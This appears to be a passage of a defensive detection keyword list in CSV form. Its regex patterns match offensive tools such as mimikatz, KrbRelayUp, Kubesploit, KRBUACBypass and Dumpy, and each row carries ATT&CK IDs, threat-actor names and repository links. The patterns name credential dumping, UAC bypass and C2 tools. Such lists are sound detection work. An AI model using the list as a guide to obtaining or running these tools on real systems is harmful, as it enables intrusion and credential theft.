"*KrbRelayUp.exe *",".{0,1000}KrbRelayUp\.exe\s.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","KrbRelayUp","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","50613"
"*KrbRelayUp.exe*",".{0,1000}KrbRelayUp\.exe.{0,1000}","offensive_tool_keyword","KrbRelayUp","a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).","T1558 - T1210","TA0004 - TA0003","N/A","Dispossessor - Back Basta","Privilege Escalation","https://github.com/Dec0ne/KrbRelayUp","1","1","N/A","N/A","10","10","1580","209","2022-08-06T12:23:58Z","2022-04-24T21:33:00Z","50614"
"*KrbRelayUp.exe*",".{0,1000}KrbRelayUp\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","50615"
"*KrbRelayUp.lib*",".{0,1000}KrbRelayUp\.lib.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","50616"
"*KrbRelayUp/1.0*",".{0,1000}KrbRelayUp\/1\.0.{0,1000}","offensive_tool_keyword","KrbRelayUp","a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).","T1558 - T1210","TA0004 - TA0003","N/A","Dispossessor - Back Basta","Privilege Escalation","https://github.com/Dec0ne/KrbRelayUp","1","1","#useragent","user-agent","10","10","1580","209","2022-08-06T12:23:58Z","2022-04-24T21:33:00Z","50617"
"*krbrelayx*",".{0,1000}krbrelayx.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/dirkjanm/krbrelayx","1","0","N/A","N/A","10","10","1281","181","2025-01-27T09:22:54Z","2019-01-08T18:42:07Z","50618"
"*krbrelayx.git*",".{0,1000}krbrelayx\.git.{0,1000}","offensive_tool_keyword","krbrelayx","Kerberos unconstrained delegation abuse toolkit","T1558.003 - T1098","TA0004 - TA0006","N/A","N/A","Exploitation tool","https://github.com/dirkjanm/krbrelayx","1","1","N/A","N/A","N/A","10","1281","181","2025-01-27T09:22:54Z","2019-01-08T18:42:07Z","50619"
"*krbrelayx.py -*",".{0,1000}krbrelayx\.py\s\-.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","50620"
"*krbrelayx.py*",".{0,1000}krbrelayx\.py.{0,1000}","offensive_tool_keyword","krbrelayx","Kerberos unconstrained delegation abuse toolkit","T1558.003 - T1098","TA0004 - TA0006","N/A","N/A","Exploitation tool","https://github.com/dirkjanm/krbrelayx","1","1","N/A","N/A","N/A","10","1281","181","2025-01-27T09:22:54Z","2019-01-08T18:42:07Z","50621"
"*krbrelayx-master*",".{0,1000}krbrelayx\-master.{0,1000}","offensive_tool_keyword","krbrelayx","Kerberos unconstrained delegation abuse toolkit","T1558.003 - T1098","TA0004 - TA0006","N/A","N/A","Exploitation tool","https://github.com/dirkjanm/krbrelayx","1","1","N/A","N/A","N/A","10","1281","181","2025-01-27T09:22:54Z","2019-01-08T18:42:07Z","50622"
"*krbroast-pcap2hashcat.py*",".{0,1000}krbroast\-pcap2hashcat\.py.{0,1000}","offensive_tool_keyword","kerberoast","Kerberoast is a series of tools for attacking MS Kerberos implementations","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","APT20","Credential Access","https://github.com/nidem/kerberoast","1","1","N/A","N/A","N/A","10","1433","317","2022-12-31T17:17:28Z","2014-09-22T14:46:49Z","50623"
"*KRBSCM: Will use the currently loaded Kerberos Service Ticket to create a new service running as SYSTEM*",".{0,1000}KRBSCM\:\sWill\suse\sthe\scurrently\sloaded\sKerberos\sService\sTicket\sto\screate\sa\snew\sservice\srunning\sas\sSYSTEM.{0,1000}","offensive_tool_keyword","KrbRelayUp","a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).","T1558 - T1210","TA0004 - TA0003","N/A","Dispossessor - Back Basta","Privilege Escalation","https://github.com/Dec0ne/KrbRelayUp","1","0","N/A","N/A","10","10","1580","209","2022-08-06T12:23:58Z","2022-04-24T21:33:00Z","50624"
"*krbtgt_password_age(self)*",".{0,1000}krbtgt_password_age\(self\).{0,1000}","offensive_tool_keyword","Adcheck","Assess the security of your Active Directory with few or all privileges. This tool offers functionalities similar to PingCastle","T1087 - T1012 - T1482 - T1059 - T1203 - T1212 - T1480 - T1552 - T1112 - T1207 - T1483 - T1113 - T1057 - T1136 - T1119 - T1082 - T1553 - T1140 - T1107 - T1078 - T1562","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Discovery","https://github.com/CobblePot59/Adcheck","1","0","N/A","N/A","10","4","315","35","2025-04-18T15:17:46Z","2024-05-10T13:54:45Z","50625"
"*KRBUACBypass 1*",".{0,1000}KRBUACBypass\s1.{0,1000}","offensive_tool_keyword","KRBUACBypass","UAC Bypass By Abusing Kerberos Tickets","T1548.002 - T1558 - T1558.003","TA0004 - TA0006","N/A","N/A","Defense Evasion","https://github.com/wh0amitz/KRBUACBypass","1","0","N/A","N/A","8","5","496","62","2023-08-10T02:51:59Z","2023-07-27T12:08:12Z","50626"
"*KRBUACBypass.csproj*",".{0,1000}KRBUACBypass\.csproj.{0,1000}","offensive_tool_keyword","KRBUACBypass","UAC Bypass By Abusing Kerberos Tickets","T1548.002 - T1558 - T1558.003","TA0004 - TA0006","N/A","N/A","Defense Evasion","https://github.com/wh0amitz/KRBUACBypass","1","1","N/A","N/A","8","5","496","62","2023-08-10T02:51:59Z","2023-07-27T12:08:12Z","50627"
"*KRBUACBypass.exe*",".{0,1000}KRBUACBypass\.exe.{0,1000}","offensive_tool_keyword","KRBUACBypass","UAC Bypass By Abusing Kerberos Tickets","T1548.002 - T1558 - T1558.003","TA0004 - TA0006","N/A","N/A","Defense Evasion","https://github.com/wh0amitz/KRBUACBypass","1","1","N/A","N/A","8","5","496","62","2023-08-10T02:51:59Z","2023-07-27T12:08:12Z","50628"
"*KRBUACBypass.sln*",".{0,1000}KRBUACBypass\.sln.{0,1000}","offensive_tool_keyword","KRBUACBypass","UAC Bypass By Abusing Kerberos Tickets","T1548.002 - T1558 - T1558.003","TA0004 - TA0006","N/A","N/A","Defense Evasion","https://github.com/wh0amitz/KRBUACBypass","1","1","N/A","N/A","8","5","496","62","2023-08-10T02:51:59Z","2023-07-27T12:08:12Z","50629"
"*KRBUACBypass/tarball*",".{0,1000}KRBUACBypass\/tarball.{0,1000}","offensive_tool_keyword","KRBUACBypass","UAC Bypass By Abusing Kerberos Tickets","T1548.002 - T1558 - T1558.003","TA0004 - TA0006","N/A","N/A","Defense Evasion","https://github.com/wh0amitz/KRBUACBypass","1","0","N/A","N/A","8","5","496","62","2023-08-10T02:51:59Z","2023-07-27T12:08:12Z","50630"
"*KRBUACBypass/zipball*",".{0,1000}KRBUACBypass\/zipball.{0,1000}","offensive_tool_keyword","KRBUACBypass","UAC Bypass By Abusing Kerberos Tickets","T1548.002 - T1558 - T1558.003","TA0004 - TA0006","N/A","N/A","Defense Evasion","https://github.com/wh0amitz/KRBUACBypass","1","0","N/A","N/A","8","5","496","62","2023-08-10T02:51:59Z","2023-07-27T12:08:12Z","50631"
"*Krueger.SiPolicy.p7b*",".{0,1000}Krueger\.SiPolicy\.p7b.{0,1000}","offensive_tool_keyword","Krueger","remotely killing EDR with WDAC","T1562.001 - T1562.004 - T1218.011 - T1548.002 - T1027","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/logangoins/Krueger","1","0","N/A","N/A","9","4","353","42","2025-01-06T06:57:14Z","2024-11-15T20:11:01Z","50632"
"*kstowell@codejockeys.com*",".{0,1000}kstowell\@codejockeys\.com.{0,1000}","offensive_tool_keyword","gh0st","Malware RAT with keylogger - dll injection - C2 - Remote control","T1204.002 - T1071.001 - T1027 - T1036.005 - T1055.001 - T1005 - T1056.001 - T1074.001 - T1105 - T1562.001 - T1543.003 - T1547.001 - T1571 - T1573.001 - T1106 - T1219","TA0002 - TA0003 - TA0004 - TA0008 - TA0009 - TA0010 - TA0011","GhostRAT","N/A","Malware","https://github.com/sin5678/gh0st","1","1","#email","N/A","10","6","508","274","2013-05-08T21:17:26Z","2012-10-05T06:25:36Z","50633"
"*ktsuss-lpe.sh*",".{0,1000}ktsuss\-lpe\.sh.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","#linux","N/A","10","10","5909","1133","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z","50634"
"*kubeletAttack.json*",".{0,1000}kubeletAttack\.json.{0,1000}","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001  -  T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","N/A","N/A","10","10","1161","119","2025-02-03T12:03:19Z","2021-02-09T15:54:23Z","50635"
"*Kubesploit Agent*",".{0,1000}Kubesploit\sAgent.{0,1000}","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001  -  T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","0","N/A","N/A","10","10","1161","119","2025-02-03T12:03:19Z","2021-02-09T15:54:23Z","50636"
"*kubesploitAgent-Darwin*",".{0,1000}kubesploitAgent\-Darwin.{0,1000}","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001  -  T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","#linux","N/A","10","10","1161","119","2025-02-03T12:03:19Z","2021-02-09T15:54:23Z","50637"
"*kubesploitAgent-Linux*",".{0,1000}kubesploitAgent\-Linux.{0,1000}","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001  -  T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","#linux","N/A","10","10","1161","119","2025-02-03T12:03:19Z","2021-02-09T15:54:23Z","50638"
"*kubesploit-main*",".{0,1000}kubesploit\-main.{0,1000}","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001  -  T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","N/A","N/A","10","10","1161","119","2025-02-03T12:03:19Z","2021-02-09T15:54:23Z","50639"
"*kubesploitServer-Darwin*",".{0,1000}kubesploitServer\-Darwin.{0,1000}","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001  -  T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","#linux","N/A","10","10","1161","119","2025-02-03T12:03:19Z","2021-02-09T15:54:23Z","50640"
"*kubesploitServer-Linux*",".{0,1000}kubesploitServer\-Linux.{0,1000}","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001  -  T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","#linux","N/A","10","10","1161","119","2025-02-03T12:03:19Z","2021-02-09T15:54:23Z","50641"
"*kubestroyer -t *",".{0,1000}kubestroyer\s\-t\s.{0,1000}","offensive_tool_keyword","Kubestroyer","Kubestroyer aims to exploit Kubernetes clusters misconfigurations and be the swiss army knife of your Kubernetes pentests","T1588.002 - T1596 - T1552.004","TA0005 - TA0007","N/A","N/A","Exploitation tool","https://github.com/Rolix44/Kubestroyer","1","0","N/A","N/A","10","4","359","22","2024-07-26T06:33:00Z","2022-09-15T13:31:21Z","50642"
"*Kubestroyer@latest*",".{0,1000}Kubestroyer\@latest.{0,1000}","offensive_tool_keyword","Kubestroyer","Kubestroyer aims to exploit Kubernetes clusters misconfigurations and be the swiss army knife of your Kubernetes pentests","T1588.002 - T1596 - T1552.004","TA0005 - TA0007","N/A","N/A","Exploitation tool","https://github.com/Rolix44/Kubestroyer","1","0","N/A","N/A","10","4","359","22","2024-07-26T06:33:00Z","2022-09-15T13:31:21Z","50643"
"*kubestroyer_linux_x64*",".{0,1000}kubestroyer_linux_x64.{0,1000}","offensive_tool_keyword","Kubestroyer","Kubestroyer aims to exploit Kubernetes clusters misconfigurations and be the swiss army knife of your Kubernetes pentests","T1588.002 - T1596 - T1552.004","TA0005 - TA0007","N/A","N/A","Exploitation tool","https://github.com/Rolix44/Kubestroyer","1","1","#linux","N/A","10","4","359","22","2024-07-26T06:33:00Z","2022-09-15T13:31:21Z","50644"
"*kubestroyer_macos_arm64*",".{0,1000}kubestroyer_macos_arm64.{0,1000}","offensive_tool_keyword","Kubestroyer","Kubestroyer aims to exploit Kubernetes clusters misconfigurations and be the swiss army knife of your Kubernetes pentests","T1588.002 - T1596 - T1552.004","TA0005 - TA0007","N/A","N/A","Exploitation tool","https://github.com/Rolix44/Kubestroyer","1","1","N/A","N/A","10","4","359","22","2024-07-26T06:33:00Z","2022-09-15T13:31:21Z","50645"
"*kubestroyer_macos_x64*",".{0,1000}kubestroyer_macos_x64.{0,1000}","offensive_tool_keyword","Kubestroyer","Kubestroyer aims to exploit Kubernetes clusters misconfigurations and be the swiss army knife of your Kubernetes pentests","T1588.002 - T1596 - T1552.004","TA0005 - TA0007","N/A","N/A","Exploitation tool","https://github.com/Rolix44/Kubestroyer","1","1","N/A","N/A","10","4","359","22","2024-07-26T06:33:00Z","2022-09-15T13:31:21Z","50646"
"*kubestroyer_windows_x64*",".{0,1000}kubestroyer_windows_x64.{0,1000}","offensive_tool_keyword","Kubestroyer","Kubestroyer aims to exploit Kubernetes clusters misconfigurations and be the swiss army knife of your Kubernetes pentests","T1588.002 - T1596 - T1552.004","TA0005 - TA0007","N/A","N/A","Exploitation tool","https://github.com/Rolix44/Kubestroyer","1","1","N/A","N/A","10","4","359","22","2024-07-26T06:33:00Z","2022-09-15T13:31:21Z","50647"
"*Kubestroyer-master*",".{0,1000}Kubestroyer\-master.{0,1000}","offensive_tool_keyword","Kubestroyer","Kubestroyer aims to exploit Kubernetes clusters misconfigurations and be the swiss army knife of your Kubernetes pentests","T1588.002 - T1596 - T1552.004","TA0005 - TA0007","N/A","N/A","Exploitation tool","https://github.com/Rolix44/Kubestroyer","1","0","N/A","N/A","10","4","359","22","2024-07-26T06:33:00Z","2022-09-15T13:31:21Z","50648"
"*Kudaes/Dumpy*",".{0,1000}Kudaes\/Dumpy.{0,1000}","offensive_tool_keyword","Dumpy","Reuse open handles to dynamically dump LSASS","T1003.001 - T1055.001 - T1083","TA0006","N/A","N/A","Credential Access","https://github.com/Kudaes/Dumpy","1","1","N/A","N/A","10","3","243","24","2024-04-04T07:42:26Z","2021-10-13T21:54:59Z","50649"
"*Kudaes/Elevator*",".{0,1000}Kudaes\/Elevator.{0,1000}","offensive_tool_keyword","Elevator","UAC bypass by abusing RPC and debug objects.","T1548.002","TA0004","N/A","N/A","Privilege Escalation","https://github.com/Kudaes/Elevator","1","1","N/A","N/A","10","7","614","69","2023-10-19T08:51:09Z","2022-08-25T21:39:28Z","50650"
"*kuhl_m_dpapi_chrome.c*",".{0,1000}kuhl_m_dpapi_chrome\.c.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","1","N/A","N/A","10","1","35","9","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z","50651"
"*kuhl_m_lsadump.c*",".{0,1000}kuhl_m_lsadump\.c.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","1","N/A","N/A","10","1","35","9","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z","50652"
"*kuhl_m_lsadump_getComputerAndSyskey*",".{0,1000}kuhl_m_lsadump_getComputerAndSyskey.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","0","N/A","https://www.virustotal.com/gui/file-analysis/ZTNjYTA2MmQ2YzhiYWUwMjc4Y2U5YmIwNmVhMDVkNDA6MTcyNDUyNTI4Ng==","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","50653"
"*kuhl_m_lsadump_getUsersAndSamKey*",".{0,1000}kuhl_m_lsadump_getUsersAndSamKey.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","0","N/A","https://www.virustotal.com/gui/file-analysis/ZTNjYTA2MmQ2YzhiYWUwMjc4Y2U5YmIwNmVhMDVkNDA6MTcyNDUyNTI4Ng==","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","50654"
"*kuhl_m_sekurlsa_msv_pth_makefakestring*",".{0,1000}kuhl_m_sekurlsa_msv_pth_makefakestring.{0,1000}","offensive_tool_keyword","Carbanak","remote backdoor used by a group of the same name (Carbanak). It is intended for espionage - data exfiltration and providing remote access to infected machines","T1021.002 - T1071.001 - T1105 - T1059 - T1003 - T1078 - T1041","TA0006 - TA0008 - TA0010 - TA0011","Carbanak","FIN7 - Carbanak","Malware","https://github.com/0x25bit/Updated-Carbanak-Source-with-Plugins","1","0","#content","N/A","10","4","396","223","2019-05-01T23:31:35Z","2019-04-22T21:01:08Z","50655"
"*kuhl_m_sekurlsa_nt6.c*",".{0,1000}kuhl_m_sekurlsa_nt6\.c.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","50656"
"*kuhl_m_sekurlsa_nt6.h*",".{0,1000}kuhl_m_sekurlsa_nt6\.h.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","50657"
"*kuhl_m_sekurlsa_packages.c*",".{0,1000}kuhl_m_sekurlsa_packages\.c.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","50658"
"*kuhl_m_sekurlsa_packages.h*",".{0,1000}kuhl_m_sekurlsa_packages\.h.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","50659"
